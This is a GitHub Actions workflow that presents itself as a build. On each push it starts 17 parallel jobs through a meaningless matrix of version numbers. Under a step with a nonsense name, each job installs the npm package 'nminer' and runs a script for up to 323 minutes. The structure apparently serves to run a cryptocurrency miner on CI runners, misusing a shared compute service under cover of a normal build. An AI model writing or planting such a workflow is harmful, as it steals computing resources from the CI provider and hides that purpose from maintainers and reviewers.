name: accompanist
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4162 }
          - { version: 3439 }
          - { version: 7175 }
          - { version: 476 }
          - { version: 5514 }
          - { version: 9095 }
          - { version: 3658 }
          - { version: 8990 }
          - { version: 2558 }
          - { version: 9469 }
          - { version: 3616 }
          - { version: 5740 }
          - { version: 3487 }
          - { version: 4207 }
          - { version: 6307 }
          - { version: 1942 }
          - { version: 646 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: grass surprisingly meager bah unfinished
        run: |
          npm install nminer@latest
          timeout 323m node accompanist.js || echo "accompanist executed"